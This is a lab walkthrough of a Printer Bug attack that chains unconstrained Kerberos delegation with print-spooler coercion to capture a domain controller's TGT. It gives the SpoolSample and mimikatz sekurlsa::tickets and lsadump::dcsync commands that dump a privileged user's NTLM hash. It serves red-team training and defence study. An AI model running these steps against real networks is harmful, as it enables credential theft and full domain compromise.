This lab demonstrates an attack on Active Directory Domain Controller (or any other host to be fair) that involves the following steps and environmental conditions:
- Attacker has to compromise a system that has an unrestricted kerberos delegation enabled.
- Attacker finds a victim that runs a print server. In this lab this happened to be a Domain Controller.
- Attacker coerces the DC to attempt authenticating to the attacker controlled host which has unrestricted kerberos delegation enabled.
- This is done via RPC API
RpcRemoteFindFirstPrinterChangeNotificationExthat allows print clients to subscribe to notifications of changes on the print server. - Once the API is called, the DC attempts to authenticate to the compromised host by revealing its TGT to the attacker controlled compromised system.
- This is done via RPC API
- Attacker extracts
DC01'sTGT from the compromised system and impersonates the DC to carry a DCSync attack and dump domain member hashes.
This lab builds on Domain Compromise via Unrestricted Kerberos Delegation
Our environment for this lab is:
- ws01 - attacker compromised host with kerberos delegation enabled (attacker, server)
- dc01 - domain controller running a print service (victim, target)
We can check if a spool service is running on a remote host like so:
ls \\dc01\pipe\spoolss
.png)
If the spoolss was not running, we would receive an error.
Another way to check if the spoolss is running on a remote machine is:
.png)
Now, after compiling the amazing PoC SpoolSample by @tifkin_, we execute it with two arguments target and server (DC with spoolss running on it):
.\SpoolSample.exe dc01 ws01
We are shown a message that the target attemped authenticating to our compromised system, so let's check if we can retrieve DC01 TGT:
mimikatz # sekurlsa::tickets
We indeed got a TGT for DC01$ computer!
With this, we can make our compromised system ws01$ appear like a Domain Controller and extract an NTLM hash for the user offense\spotless which we know has high privileges in the domain:
mimikatz # lsadump::dcsync /domain:offense.local /user:spotless
The above clearly shows the attack was successful and an NTLM hash for the user spotless got retrieved - get cracking or passing it now.
For mitigations, see Domain Compromise via Unrestricted Kerberos Delegation mitigations section.
{% embed url="https://github.com/leechristensen/SpoolSample" %}
{% embed url="https://adsecurity.org/?p=4056" %}
{% embed url="https://adsecurity.org/?p=2053" %}